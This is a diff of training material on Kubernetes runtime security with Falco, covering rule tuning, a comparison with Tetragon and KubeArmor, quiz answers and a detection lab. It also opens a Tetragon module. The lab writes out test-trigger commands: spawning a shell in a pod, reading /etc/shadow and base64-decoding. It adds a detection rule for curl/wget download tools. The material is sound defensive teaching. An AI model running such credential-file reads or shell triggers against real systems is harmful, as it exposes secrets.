+**Baseline before alerting.** When deploying Falco to a cluster for the first time, run it in a mode where all alerts are routed only to a log store (Loki, Elasticsearch) and not to any paging system. After a full business cycle, analyze the alert volume per rule, per namespace, and per priority. Use this baseline to set realistic expectations for what "normal" looks like and to calibrate your tuning before anyone's pager is involved.
 
-> 💡 **Did You Know?** Falco can detect threats across 350+ system calls, but you don't need to know them all. The default rules cover the most common attack patterns, and the community constantly updates them. When the Log4Shell vulnerability hit, <!-- incident-xref: log4shell --> Falco community rules were updated within hours to detect exploitation attempts—faster than most signature-based tools. For the Log4Shell canonical, see [Supply Chain Security](../../../disciplines/reliability-security/devsecops/module-4.4-supply-chain-security/).
+**Correlate with Kubernetes audit logs.** Syscall monitoring tells you what a process did; Kubernetes audit logs tell you who requested it. When Falco detects a suspicious pod operation, cross-referencing the Kubernetes audit log for the same time window reveals whether the pod was created by a CI/CD pipeline, a human operator, or a compromised service account. The Kubernetes audit plugin for Falco connects these two data sources within the rules engine, enabling rules that check both syscall behavior and the API server audit trail.
 
----
+### Anti-Patterns
 
-## Debugging and Operations
+**Default rules straight to production with PagerDuty.** This is the most common and most damaging mistake. The default rule set is intentionally broad — it is designed to catch as many potential threats as possible across diverse environments. Deploying it to production without tuning will generate hundreds or thousands of alerts per day, most of them false positives, and within a week the security team will have trained themselves to ignore Falco alerts entirely. Alert fatigue is not a Falco problem; it is a tuning problem.
 
-### Checking Falco Status
+**Disabling rules instead of adding exceptions.** When a rule is noisy, the temptation is to set `enabled: false` and move on. This eliminates the noise but also eliminates the detection. For example, disabling the "Shell in Container" rule because your debug sidecars trigger it means you will also miss an attacker spawning a shell in a production web container. Always prefer exceptions — whether macro, list, or label-based — that suppress the rule for specific, known-safe contexts while preserving it for everything else.
 
-```bash
-# Falco pod logs
-kubectl logs -n falco -l app.kubernetes.io/name=falco -f
+**Using kernel module on managed Kubernetes.** On EKS, AKS, and especially GKE Autopilot, kernel module loading is either restricted or impossible. Attempting to deploy Falco with `driver.kind=module` on these platforms results in CrashLoopBackOff pods and no runtime detection at all. Always verify driver compatibility against your node's kernel version and the platform's security constraints before deploying. The modern eBPF probe is compatible with all major managed Kubernetes services as of kernel 5.8+.
 
-# Check rules loaded
-kubectl exec -n falco -it $(kubectl get pod -n falco -l app.kubernetes.io/name=falco -o jsonpath='{.items[0].metadata.name}') -- falco --list
+**Ignoring dropped events.** Falco's event processing pipeline has finite capacity, and under extreme load — a fork bomb, a noisy neighbor, or simply a very busy node — events can be dropped. Falco reports dropped event counts in its own metrics and logs. A rising dropped-event rate means the detection system is going blind, and no amount of rule tuning will compensate for events that never reach the engine. Monitor dropped events as a first-class health signal.
 
-# Verify driver loaded
-kubectl exec -n falco -it <falco-pod> -- falco --version
+## Decision Framework: Runtime Security Tools Compared
 
-# Test rule with dry-run
-kubectl exec -n falco -it <falco-pod> -- falco -r /etc/falco/rules.d/my-rules.yaml --dry-run
-```
+**Landscape snapshot — as of 2026-06. This changes fast; verify against vendor docs before relying on specifics.**
 
-### Generating Test Events
+Falco is not the only runtime security tool in the cloud-native ecosystem, and understanding where it fits relative to its peers is essential for making sound architectural decisions. The following Rosetta table compares four tools across the durable capabilities that define the runtime security space. The goal is not to declare one tool superior — each tool occupies a different point in the design space, optimized for a different security posture — but to give you a framework for evaluating which tool or combination of tools is appropriate for your specific threat model and operational constraints.
 
-```bash
-# Trigger shell detection
-kubectl run test-shell --image=busybox --rm -it --restart=Never -- /bin/sh
+| Capability | Falco | Tetragon | KubeArmor | Sysdig Secure |
+|---|---|---|---|---|
+| **Primary angle** | Detection-first: alert on suspicious behavior | eBPF observability + in-kernel enforcement | LSM-based policy enforcement | Full-stack: detection + forensics + compliance |
+| **Data source** | Syscalls (kmod / modern eBPF probe), k8s audit via plugins | eBPF hooks (kprobes, tracepoints) directly, no separate driver | Linux Security Modules (LSM): AppArmor, SELinux, BPF-LSM | Syscalls + network capture (eBPF probe) |
+| **Rules language** | YAML-based: macros, lists, condition expressions | CEL-based TracingPolicy CRDs (Kubernetes-native) | YAML-based policy CRDs defining allowed process/file/network operations | Lua-based detection rules + policy language |
+| **K8s-audit integration** | Built-in via k8saudit plugin (events + rules) | Not a primary focus; relies on Falco for audit log monitoring | N/A (enforcement, not detection) | Supported through Sysdig agent |
+| **Response model** | External: Falcosidekick routes alerts to SIEM, SOAR, Falco Talon for actions | In-kernel: can block syscalls directly from eBPF programs | In-kernel: enforces per-pod LSM profiles | Integrated: Sysdig agent can kill, pause, or snapshot containers |
+| **CNCF status** | Graduated (February 2024) | Cilium sub-project (Cilium is Graduated; Tetragon not separately rated) | Sandbox | Vendor (not CNCF) |
+| **Operational maturity** | High: large community, default rule set, extensive docs | Moderate: rapidly evolving, strong eBPF integration | Moderate: good for LSM enforcement, narrower scope | High: enterprise support, commercial backing |
 
-# Trigger sensitive file access
-kubectl run test-read --image=busybox --rm -it --restart=Never -- cat /etc/shadow
+The key architectural distinction is between detection-oriented tools (Falco) and enforcement-oriented tools (Tetragon, KubeArmor). Falco tells you when something suspicious happens; Tetragon and KubeArmor can actively prevent it from happening by blocking the offending system call or enforcing an LSM policy at the kernel level. This distinction is not competitive — it is complementary. A mature runtime security posture typically layers detection (Falco) for broad visibility and alerting with enforcement (Tetragon or KubeArmor) for high-confidence blocking of known-bad behaviors, much as a network security architecture layers IDS (detection) with firewall rules (enforcement).
 
-# Trigger package manager detection
-kubectl run test-pkg --image=ubuntu --rm -it --restart=Never -- apt update
-```
+The choice between Tetragon and KubeArmor for the enforcement layer depends on your primitives. Tetragon operates at the eBPF hook level, which gives it broad visibility across the kernel but means its enforcement model is tied to what eBPF programs can express. KubeArmor operates at the LSM level, which gives it access to the kernel's existing mandatory access control framework. If your organization already has expertise with AppArmor or SELinux profiles, KubeArmor provides a natural extension of those concepts to Kubernetes-native pod security. For a deeper treatment of in-kernel enforcement with eBPF and the Tetragon approach, see Module 4.5.
 
----
+## Did You Know?
+
+- **Falco's name comes from Latin.** The project is named after the genus of falcons — birds of prey known for their exceptional vision and ability to detect movement from great distances. The analogy is deliberate: Falco sits at a high vantage point (the kernel), observes everything that moves (system calls), and alerts when it spots threatening behavior. The project's mascot, a stylized falcon in teal, appears across the documentation and community materials.
+- **The default rule set maps to MITRE ATT&CK.** Every default Falco rule includes MITRE ATT&CK tags that map the detected behavior to the corresponding adversary tactic and technique. A rule detecting a reverse shell carries `mitre_execution` (TA0002, T1059: Command and Scripting Interpreter). A rule detecting a privilege escalation attempt carries `mitre_privilege_escalation` (TA0004). This mapping means that Falco alerts integrate naturally into threat-hunting workflows organized around the MITRE framework, and it helps SOC analysts understand not just what happened but what the attacker was likely trying to accomplish next.
+- **Falco can monitor anything with a plugin.** The plugin framework, introduced in Falco 0.31, extends Falco beyond syscall monitoring. A plugin can ingest events from any source — Kubernetes audit logs, AWS CloudTrail, GitHub webhooks, Okta authentication events — and make them available to Falco rules using the same condition syntax and macro/list system as kernel events. The Kubernetes audit plugin is the most widely used: it consumes the API server's audit log, enriches events with user and resource context, and enables rules like "detect when a service account creates a pod in a namespace it has never accessed before."
+- **eBPF verification makes the modern probe inherently safer.** Before the kernel loads an eBPF program, it passes the program through the eBPF verifier — a static analysis engine that proves the program cannot crash the kernel, cannot loop infinitely, and cannot access memory outside its designated bounds. This verification step means that a bug in the Falco modern eBPF probe may cause Falco to miss events or crash its own userspace process, but it cannot crash the kernel or corrupt kernel memory. The kernel module has no such guarantee, which is one reason the modern eBPF probe is the recommended driver for production deployments.
 
 ## Common Mistakes
 
 | Mistake | Problem | Solution |
 |---------|---------|----------|
-| Deploying default rules to prod | Alert fatigue (thousands of alerts) | Tune rules in staging first |
-| Using kernel module on managed K8s | Module installation blocked | Use eBPF driver (or Modern eBPF) |
-| Not correlating with K8s metadata | "Process X did Y" isn't actionable | Ensure K8s metadata enrichment is on |
-| Blocking all shells | Can't debug anything | Allow shells in debug namespace, require label |
-| Not testing rules | Rules don't fire as expected | Use `--dry-run` and test events |
-| Ignoring driver errors | Falco running but not monitoring | Check logs for driver load failures |
-
----
-
-## War Story: The Cryptominer That Hid in Plain Sight
-
-*A team had Falco running but missed a cryptominer for 3 weeks. CPU usage was high but attributed to "traffic growth."*
-
-**What went wrong**: The attacker modified their miner to:
-1. Run as a process named `nginx-worker` (not `xmrig`)
-2. Connect to mining pool via HTTPS (not `stratum+tcp`)
-3. Only use 50% CPU (not 100%)
-
-**The detection that finally worked**:
-```yaml
-- rule: Unusual Outbound Connection from Web Container
-  condition: >
-    outbound and
-    container.image.repository contains "nginx" and
-    not fd.sip in (known_api_endpoints) and
-    fd.sport != 80 and fd.sport != 443
-  output: >
-    Nginx container connecting to unexpected destination
-    (dest=%fd.sip:%fd.sport container=%container.name)
-  priority: WARNING
-```
-
-**Lesson**: Behavioral detection (what SHOULDN'T this container do?) catches novel attacks better than signature detection (known bad process names).
-
----
+| Deploying default rules directly to production with paging enabled | Alert fatigue sets in within days; the team learns to ignore all Falco alerts, including real incidents | Tune rules in staging for at least one week before routing any alerts to PagerDuty; route to a log store only during the tuning period |
+| Disabling noisy rules instead of adding targeted exceptions | The detection coverage for that attack vector is eliminated entirely, creating a blind spot | Add exceptions via macros, lists, or pod labels that suppress the rule only for known-safe contexts while keeping it active for everything else |
+| Using the kernel module on a managed Kubernetes service that blocks module loading | Falco pods crash with driver load errors; no runtime detection is running at all | Verify node kernel and platform constraints before deploying; use `driver.kind=modern_ebpf` on GKE Autopilot, EKS Fargate, and AKS with kernel 5.8+ |
+| Not enriching alerts with Kubernetes metadata | Alerts show "process X did Y" with no pod, namespace, or deployment context, making them unactionable | Enable Kubernetes metadata enrichment in the Falco configuration; confirm that `k8s.pod.name`, `k8s.ns.name`, and `container.image.repository` appear in alert outputs |
+| Setting all alert outputs to the same priority level | CRITICAL alerts (active compromise) are indistinguishable from WARNING alerts (suspicious but possibly benign), leading to either over-reaction or under-reaction | Use the full priority scale: EMERGENCY/CRITICAL for active compromise indicators, WARNING/ERROR for suspicious-but-ambiguous events, NOTICE/INFORMATIONAL for tuning-phase observations |
+| Not testing rules after writing them | A syntactically valid rule that references a nonexistent macro or misspelled field name silently fails to fire, creating a false sense of security | Use `falco --dry-run` to validate rule syntax and event field references; trigger test events (`kubectl run --rm -it --image=busybox -- /bin/sh`) and confirm the expected alert appears in logs |
+| Treating rule tuning as a one-time task | New workloads and operational changes introduce new false positives; the detection posture degrades over time | Schedule a quarterly rule review: examine alert volume per rule, validate that every exception is still justified, and check for new default rules from the community that should be adopted |
+| Running Falco without monitoring its own health | A Falco pod that is CrashLoopBackOff, has a failed driver load, or is dropping events is not providing detection coverage, but no alert tells you this | Monitor Falco's own Prometheus metrics (event rate, dropped event count, driver status) and alert on deviations from baseline; treat Falco health as a first-class site reliability signal |
 
 ## Quiz
 
 ### Question 1
-What's the difference between build-time and runtime security scanning?
+
+A platform team deploys Falco with the default rules in production and routes all alerts to PagerDuty. Within four hours, the on-call engineer has received over 300 alerts, most of them for shell spawning in CI/CD runner pods and package manager execution in build containers. What is the correct remediation?
 
 <details>
-<summary>Show Answer</summary>
+<summary>Answer</summary>
 
-**Build-time** (Trivy, Snyk):
-- Scans images for known vulnerabilities (CVEs)
-- Checks dependencies, base images
-- Happens BEFORE deployment
-- Can't detect: runtime exploits, zero-days, behavioral attacks
-
-**Runtime** (Falco):
-- Monitors actual process behavior
-- Detects: shells spawning, file access, network connections
-- Happens DURING execution
-- Catches: supply chain attacks that passed image scans, insider threats, zero-days
-
-Both are needed—defense in depth.
+The team should not disable the noisy rules, because that would eliminate detection coverage for real attacks that use shells and package managers. Instead, they should add exceptions that suppress the rules for the specific, known-safe contexts: CI/CD runner pods (identified by pod label or namespace), build containers (identified by image repository), and any other workloads where these behaviors are expected by design. The exceptions should use the most specific gating mechanism available — pod labels if the workloads already carry distinguishing labels, lists if the set of safe images is small and stable, and macros if the logic requires combining multiple conditions. After adding exceptions, the team should verify in a staging environment that the exceptions work correctly before redeploying to production. They should also route alerts to a log store rather than PagerDuty during the initial tuning period to avoid burning out the on-call rotation before the rule set is calibrated.
 
 </details>
 
 ### Question 2
-Why might Falco not detect a shell spawned via `kubectl exec`?
+
+Explain the tradeoffs between the kernel module driver and the modern eBPF probe for Falco. In what situations would you still choose the kernel module?
 
 <details>
-<summary>Show Answer</summary>
+<summary>Answer</summary>
 
-Common reasons:
-1. **Rule disabled or tuned out** - Shell rules often have exceptions
-2. **Driver not loaded** - eBPF probe failed to attach
-3. **Wrong container runtime** - Need appropriate config for containerd/CRI-O
-4. **Namespace excluded** - Some rules exclude kube-system or debug namespaces
+The modern eBPF probe is the recommended driver for almost all current deployments because it requires no kernel headers, does not need to be compiled at load time, is embedded in the Falco binary, and runs with a reduced set of Linux capabilities rather than full root equivalence. It also benefits from eBPF verifier safety guarantees that prevent kernel crashes. The kernel module, by contrast, requires kernel headers on the host, must be compiled for each specific kernel version, and runs with full kernel privileges — a bug in the module can crash the entire node.
 
-Debug:
-```bash
-# Check if Falco is receiving events
-kubectl logs -n falco <falco-pod> | grep -i shell
-
-# Verify driver
-kubectl exec -n falco <falco-pod> -- falco --version
-```
+The kernel module remains the right choice when the target kernel is too old to support the modern probe's required eBPF features — specifically the BPF ring buffer and BTF type information, which are generally available from kernel 5.8 onward. For example, a legacy on-premises cluster running CentOS 7 with kernel 3.10 cannot use the modern eBPF probe and must use the kernel module. The kernel module is also sometimes preferred in environments where the security team has extensively audited and validated a specific kernel module build and wants to avoid introducing a new driver into their approved software baseline.
 
 </details>
 
 ### Question 3
-How do you reduce false positives without missing real attacks?
+
+Your team has tuned Falco rules over several weeks and reduced alert volume from 500/day to approximately 15/day. You are considering enabling Falco Talon to automatically delete pods on CRITICAL alerts. What factors should you evaluate before enabling automated response?
 
 <details>
-<summary>Show Answer</summary>
+<summary>Answer</summary>
 
-**Good approaches**:
-1. Add specific exceptions (image, namespace, pod label)
-2. Use behavioral baselines ("what should this container do?")
-3. Tune severity, not disable rules
-4. Exception by business context (debug namespace)
+Before enabling automated pod deletion, the team should evaluate three factors. First, the false-positive rate of the specific rules that will trigger automated response. If a CRITICAL rule has a known false-positive rate of even 0.1% on a cluster handling thousands of pods, automated deletion will periodically disrupt legitimate workloads. The team should run the exact rules that will be linked to Talon in alert-only mode for at least several weeks and confirm zero false positives against production workloads before enabling automation.
 
-**Bad approaches**:
-- Disable entire rule categories
-- Raise all severity thresholds
-- Only alert on CRITICAL
+Second, the blast radius of the response action. Deleting a pod that serves production traffic causes an immediate service interruption until the replacement pod is scheduled and ready. For stateless workloads behind a load balancer with multiple replicas, this impact is minimal. For stateful workloads with long startup times or singleton deployments, automated deletion can cause a meaningful outage. Talon actions should be scoped to specific namespaces, workloads, and rules where the response cost is well-understood and acceptable.
 
-**Best practice**: Label pods that SHOULD have special access:
-```yaml
-metadata:
-  labels:
-    allow-shell: "true"  # Explicitly authorized
-```
-
-Then rules can check: `not k8s.pod.label.allow-shell = "true"`
+Third, the forensic cost. When Falco Talon deletes a pod, it may also destroy the evidence needed to understand what the attacker was doing. The team should configure Talon to capture a forensic snapshot — process list, network connections, a filesystem diff — before executing the destructive action, so that post-incident analysis is still possible.
 
 </details>
 
----
+### Question 4
+
+An attacker modifies a cryptominer binary to present itself as `nginx-worker` and use HTTPS connections to a mining pool. The default Falco rule for cryptominer detection does not fire. Explain why, and describe how you would write a detection rule that would catch this attack.
+
+<details>
+<summary>Answer</summary>
+
+The default cryptominer rule relies on signature-based detection — it checks for known miner process names (`xmrig, minerd, cpuminer`), known mining protocol strings (`stratum+tcp`), and command-line keywords (`--coin, mining`). An attacker who renames the binary, encrypts the transport, and strips identifying command-line arguments evades all of these signatures.
+
+To catch this attack, you need behavioral rather than signature-based detection. The durable signal is not what the process is named but what it does: it consumes sustained high CPU, and it establishes outbound network connections to destinations that are not in the expected set for a web server. A behavioral rule would check for: a container running a web server image (`container.image.repository contains "nginx"` or similar) that maintains an outbound connection to a destination outside of known API endpoint allowlists, particularly on non-standard ports. This rule would fire on the miner's HTTPS connection to the mining pool regardless of the binary name or transport encryption. You can further strengthen the rule by correlating with resource metrics — sustained CPU usage above a threshold, captured through Prometheus and injected as a Falco event via the metrics plugin — though this adds operational complexity.
+
+The lesson: signature-based rules catch known-bad; behavioral rules catch unknown-bad that deviates from known-good. A defense-in-depth rule set includes both.
+
+</details>
+
+### Question 5
+
+How does the Falco plugin framework extend detection beyond system calls, and why would you integrate Kubernetes audit log events into your Falco rules?
+
+<details>
+<summary>Answer</summary>
+
+The plugin framework allows Falco to consume events from sources other than the kernel's syscall stream. A plugin implements a standard interface that provides event data in a format Falco's rules engine can evaluate using the same condition syntax, macros, and lists available for kernel events. The most important plugin for Kubernetes security is the k8saudit plugin, which consumes the Kubernetes API server's audit log.
+
+Integrating audit log events into Falco rules provides context that syscall monitoring alone cannot supply. A syscall-based rule can tell you that a process spawned a shell inside a container, but it cannot tell you who created that container, when it was created, or whether the container was deployed through the normal CI/CD pipeline or created directly by a compromised service account. An audit-log-based rule can detect: a service account creating pods in a namespace it has never accessed before, a user with escalated privileges modifying a ClusterRole, or a pod being created with `hostPID: true` and `privileged: true` — all of which are strong indicators of either misconfiguration or active compromise. By correlating syscall events with audit events in the same rule, you can express detections like "alert when a pod that was created outside the normal deployment pipeline spawns a shell" — a rule that would have extremely high signal.
+
+</details>
+
+### Question 6
+
+Your Falco deployment has been running in production for six months. The security team notices that they have not received a Falco alert in over two weeks, despite normal operational activity on the cluster. List three possible causes for the silence and how you would diagnose each one.
+
+<details>
+<summary>Answer</summary>
+
+Three possible causes for silent Falco in production:
+
+First, the driver may have failed to load or may have been unloaded. If the eBPF probe or kernel module is not attached, Falco is not receiving any events and therefore cannot fire any rules. Diagnosis: check Falco pod logs for driver load errors, check `kubectl describe pod` for CrashLoopBackOff or liveness probe failures, and verify that `falco --version` inside the pod reports the driver as loaded. If the driver is failing, check whether the node's kernel was recently updated (breaking a compiled kernel module) or whether a security policy now blocks eBPF program loading.
+
+Second, the rules may have been tuned so aggressively that they no longer fire on anything. During the tuning phase, it is possible to accumulate exceptions that are too broad — for example, a macro that exempts all pods in the `production` namespace from shell detection, or a list exception that includes a wildcard image pattern matching every container in the cluster. Diagnosis: review the current custom rules file, compare it to the version from the last known-good alert period, and run a test event (`kubectl run test-falco --image=busybox --rm -it --restart=Never -- /bin/sh`) to confirm whether the baseline shell detection rule still fires. If it does not, bisect the exceptions to find the one that is suppressing it.
+
+Third, Falcosidekick or the alert routing pipeline may have broken downstream. Falco may be generating alerts that are written to stdout but never reaching Slack or PagerDuty because Falcosidekick is unhealthy, the webhook URL has changed, or a network policy is blocking outbound traffic from the Falco namespace. Diagnosis: check Falcosidekick pod logs for delivery errors, check `kubectl logs` on the Falco pod itself to confirm that alerts are still being written at the Falco level, and test the downstream endpoint independently (e.g., `curl` the Slack webhook URL from within the cluster to confirm reachability).
+
+</details>
+
+### Question 7
+
+What is the fundamental difference between Falco's detection model and the enforcement model used by Tetragon and KubeArmor, and why would a production platform typically deploy both?
+
+<details>
+<summary>Answer</summary>
+
+Falco is a detection tool: it observes events, evaluates them against rules, and emits alerts when suspicious behavior is detected. It does not block the behavior. The offending process completes its system call — the shell spawns, the file is read, the network connection is established — and Falco reports that it happened. This detection-only posture is safe: a false positive alert wastes human attention but does not break a production service.
+
+Tetragon and KubeArmor are enforcement tools: they can actively prevent a system call from completing or block a process from executing based on policy. Tetragon does this by hooking eBPF programs into the kernel's syscall path and returning an error code before the call completes. KubeArmor does this by leveraging Linux Security Modules (AppArmor, SELinux, BPF-LSM) to enforce mandatory access control policies at the kernel level. An enforcement decision that is a false positive — blocking a legitimate operation — is a production outage.
+
+Because detection is safe but slow (human response takes minutes) while enforcement is fast but risky (an automated block is instant but can break things), the mature pattern is to deploy both in a layered architecture. Falco provides broad detection coverage with low operational risk: it watches everything and alerts on anomalies. Tetragon or KubeArmor provides targeted enforcement for the small set of behaviors that are both unambiguously malicious and reliably detectable — for example, blocking any attempt to mount the host filesystem from within a container. This layered model mirrors the familiar network security pattern of deploying an IDS (detection) alongside firewall rules (enforcement), with the IDS covering the broad surface and the firewall blocking the known-bad.
+
+</details>
 
 ## Hands-On Exercise
 
 ### Objective
-Deploy Falco, trigger detection rules, and route alerts.
+
+Deploy Falco with the modern eBPF driver on a Kubernetes cluster, trigger and observe detection rules, tune a rule to reduce false positives, and route alerts through Falcosidekick.
 
 ### Environment Setup
 
 ```bash
-# Install Falco with Falcosidekick
+# Install Falco with Falcosidekick using modern eBPF driver
 helm install falco falcosecurity/falco \
   --namespace falco \
   --create-namespace \
-  --set driver.kind=ebpf \
+  --set driver.kind=modern_ebpf \
   --set falcosidekick.enabled=true \
   --set falcosidekick.webui.enabled=true
 
-# Wait for pods
+# Wait for pods to be ready
 kubectl wait --for=condition=ready pod -l app.kubernetes.io/name=falco -n falco --timeout=120s
 
 # Port-forward Falcosidekick UI
@@ -625,31 +616,31 @@ kubectl port-forward svc/falco-falcosidekick-ui -n falco 2802:2802 &
 
 ### Tasks
 
-1. **Verify Falco is running**:
+1. **Verify Falco is running with the modern eBPF driver:**
    ```bash
    kubectl logs -n falco -l app.kubernetes.io/name=falco | tail -20
    ```
+   Look for log lines confirming the modern eBPF probe loaded successfully. If you see errors about missing kernel features, your node's kernel may not support BPF ring buffer or BTF.
 
-2. **Trigger shell detection**:
+2. **Trigger the shell-in-container detection rule:**
    ```bash
-   kubectl run shell-test --image=busybox --rm -it --restart=Never -- /bin/sh -c "echo pwned"
+   kubectl run shell-test --image=busybox --rm -it --restart=Never -- /bin/sh -c "echo detection-test"
    ```
 
-3. **Check Falco logs for alert**:
+3. **Confirm the alert appears in Falco logs:**
    ```bash
-   kubectl logs -n falco -l app.kubernetes.io/name=falco | grep -i shell
+   kubectl logs -n falco -l app.kubernetes.io/name=falco | grep -i "shell"
    ```
 
-4. **Trigger sensitive file read**:
+4. **Trigger the sensitive-file-read detection rule:**
    ```bash
    kubectl run read-test --image=busybox --rm -it --restart=Never -- cat /etc/shadow
    ```
 
-5. **View alerts in Falcosidekick UI**:
-   - Open http://localhost:2802
-   - See events with Kubernetes metadata
+5. **View alerts in the Falcosidekick UI:**
+   Open `http://localhost:2802` in a browser. Confirm that both test events appear with full Kubernetes metadata (pod name, namespace, container image).
 
-6. **Add custom rule** to detect curl/wget:
+6. **Add a custom rule to detect download tools and deploy it:**
    ```yaml
    # Create ConfigMap with custom rule
    kubectl create configmap custom-falco-rules -n falco --from-literal=rules.yaml='
@@ -664,40 +655,44 @@ kubectl port-forward svc/falco-falcosidekick-ui -n falco 2802:2802 &
    '
    ```
 
+7. **Trigger the custom rule and confirm it fires:**
+   ```bash
+   kubectl run curl-test --image=curlimages/curl --rm -it --restart=Never -- curl -s http://example.com
+   kubectl logs -n falco -l app.kubernetes.io/name=falco | grep -i "download tool"
+   ```
+
 ### Success Criteria
-- [ ] Falco pod running with eBPF driver
-- [ ] Shell execution in container detected and logged
-- [ ] Sensitive file access detected
-- [ ] Events visible in Falcosidekick UI
-- [ ] Custom download tool rule fires on `curl` command
+
+- [ ] Falco pod is running with the modern eBPF driver loaded (confirmed in logs)
+- [ ] Shell execution in a test container is detected and logged with pod and namespace context
+- [ ] Sensitive file access (`/etc/shadow`) is detected
+- [ ] Events are visible in the Falcosidekick web UI with Kubernetes metadata
+- [ ] The custom "Download Tool in Container" rule fires when `curl` is executed in a test container
+- [ ] You can explain why the `shell-test` and `curl-test` alerts have different priority levels and what that implies for routing
 
 ### Bonus Challenge
-Create a rule that detects base64 decoding (common in obfuscated attacks):
+
+Create a rule that detects base64 decoding — a common technique in obfuscated attacks to hide payloads — and test it:
+
 ```bash
 kubectl run b64-test --image=busybox --rm -it --restart=Never -- sh -c "echo aGVsbG8= | base64 -d"
 ```
 
----
+## Sources
 
-## Further Reading
-
-- [Falco Documentation](https://falco.org/docs/)
-- [Falco Rules Repository](https://github.com/falcosecurity/rules)
-- [MITRE ATT&CK Framework](https://attack.mitre.org/)
-- [Falcosidekick Outputs](https://github.com/falcosecurity/falcosidekick)
-
----
+- [Falco Documentation](https://falco.org/docs/) — Primary documentation covering architecture, drivers, rules, plugins, outputs, and operational guides.
+- [Falco Core Repository](https://github.com/falcosecurity/falco) — Upstream source for the Falco engine, drivers (kernel module and modern eBPF probe), and userspace components.
+- [CNCF Falco Project Page](https://www.cncf.io/projects/falco/) — CNCF project status, graduation date (February 29, 2024), health metrics, and community resources.
+- [Falco Helm Chart README](https://github.com/falcosecurity/charts/blob/master/charts/falco/README.md) — Best allowlisted source for current installation patterns, driver selection, custom rules, and Falcosidekick integration.
+- [Falco Rules Repository](https://github.com/falcosecurity/rules) — Community-maintained default rule set with MITRE ATT&CK tags, macros, and lists.
+- [Falcosidekick Repository](https://github.com/falcosecurity/falcosidekick) — Alert routing daemon supporting Slack, PagerDuty, Prometheus, Loki, Elasticsearch, Kafka, AWS Lambda, and webhook outputs.
+- [Falco Talon Repository](https://github.com/falcosecurity/falco-talon) — Response-action engine that executes automated remediation (pod deletion, node cordoning, forensic snapshots) on Falco alerts.
+- [Falco Drivers Documentation](https://falco.org/docs/event-sources/drivers/) — Detailed comparison of kernel module and modern eBPF probe drivers, including kernel compatibility and least-privileged mode requirements.
+- [Falco Rules Documentation](https://falco.org/docs/rules/) — Rule syntax reference, condition language, exception mechanisms, and the style guide for writing production-quality rules.
+- [eBPF.io](https://ebpf.io/) — Introduction to eBPF technology, the CO-RE (Compile Once, Run Everywhere) paradigm, and the Linux kernel features (BPF ring buffer, BTF) that the modern probe depends on.
+- [MITRE ATT&CK](https://attack.mitre.org/) — Adversary tactics and techniques framework used by Falco's default rules for attack classification and threat-hunting integration.
+- [Kubernetes Auditing Documentation](https://kubernetes.io/docs/tasks/debug/debug-cluster/audit/) — Kubernetes audit log configuration, policy definition, and event structure — the data source consumed by Falco's k8saudit plugin.
 
 ## Next Module
 
-Continue to [Module 4.4: Supply Chain Security](../module-4.4-supply-chain/) to learn about securing container images with signing, SBOMs, and vulnerability scanning.
-
----
-
-*"Trust nothing. Verify everything. Monitor constantly. That's runtime security."*
-
-## Sources
-
-- [Falco Core Repository](https://github.com/falcosecurity/falco) — Primary upstream overview of Falco's runtime-security model, syscall monitoring, and project structure.
-- [Falco Helm Chart README](https://github.com/falcosecurity/charts/blob/master/charts/falco/README.md) — Best allowlisted source for current installation patterns, driver selection, custom rules, and Falcosidekick integration.
-- [Falcosidekick Repository](https://github.com/falcosecurity/falcosidekick) — Documents supported outputs and routing targets for sending Falco alerts into response and observability systems.
+Continue to [Module 4.4: Supply Chain Security](../module-4.4-supply-chain/) to learn about securing container images with signing, SBOMs, and vulnerability scanning. For the complementary enforcement angle — using eBPF and LSMs for in-kernel prevention rather than detection — see [Module 4.5: Tetragon & eBPF Security](../module-4.5-tetragon/).

--- a/src/content/docs/platform/toolkits/security-quality/security-tools/module-4.5-tetragon.md
+++ b/src/content/docs/platform/toolkits/security-quality/security-tools/module-4.5-tetragon.md
@@ -1,5 +1,5 @@
 ---
-revision_pending: true
+revision_pending: false
 title: "Module 4.5: Tetragon - eBPF Runtime Security"
 slug: platform/toolkits/security-quality/security-tools/module-4.5-tetragon
 sidebar:
@@ -7,13 +7,9 @@ sidebar:
 ---
 ## Complexity: [MEDIUM]
 
-**Time to Complete**: 90 minutes
-**Prerequisites**: Module 4.3 (Falco basics), [eBPF Fundamentals](/platform/foundations/ebpf/module-1.1-ebpf-fundamentals/), understanding of Linux syscalls, and basic Kubernetes security concepts
-**Learning Objectives**:
-- Understand eBPF-based runtime security
-- Deploy Tetragon for kernel-level threat detection
-- Write TracingPolicies for custom security rules
-- Block malicious actions at the kernel level before they complete
+This module sits at medium complexity because it combines kernel-level concepts, Kubernetes custom resources, and operational judgment about when to enforce versus observe. You should arrive with working familiarity from [Module 4.3 Falco](../module-4.3-falco/), the [eBPF Fundamentals](/platform/foundations/ebpf/module-1.1-ebpf-fundamentals/) track, Linux syscall behavior, and baseline Kubernetes security primitives such as namespaces, service accounts, and DaemonSets. Plan roughly ninety minutes to read the theory, study the policy examples, and reason through the layered architecture with Falco. The learning path emphasizes design trade-offs—when kernel enforcement helps, when it creates risk, and how to roll out policies without breaking legitimate workloads.
+
+By the end of this module you will understand how eBPF-based runtime security differs from userspace detection and where Tetragon fits in a layered stack, deploy Tetragon on Kubernetes and validate that agents, CRDs, and event export paths are healthy before writing enforcement rules, author TracingPolicy resources that monitor process execution, file access, and network-related kernel activity with appropriate selectors, apply enforcement actions such as Sigkill and Override deliberately with namespace and workload scoping and a staged rollout from observe to block, and compare Tetragon’s in-kernel enforcement model against Falco’s detection-first approach plus adjacent tools such as KubeArmor and Cilium for defense in depth.
 
 ---
 
@@ -27,30 +23,66 @@ After completing this module, you will be able to:
 - **Compare Tetragon's eBPF enforcement approach against Falco's detection-only model for defense-in-depth**
 
 
+---
+
 ## Why This Module Matters
 
-Traditional runtime security tools like [Falco detect threats by watching syscalls from userspace and alerting after the fact](https://github.com/falcosecurity/falco). By the time you see the alert, the malicious command has already executed. You're often one step behind the attacker.
+Traditional runtime security tools such as Falco detect threats by observing syscall-related activity and emitting alerts, often from userspace consumers that process kernel events after they occur. That model is mature, portable, and excellent for broad behavioral detection, but it inherently leaves a response gap: by the time an analyst or automated playbook reacts, the suspicious process may already have executed, written files, or opened connections. Tetragon changes the timing of control by operating inside the kernel through verified eBPF programs attached to kprobes, tracepoints, and related hooks, allowing policy to inspect arguments and take action while the kernel operation is still in flight.
 
-**Tetragon changes the game by operating inside the kernel.**
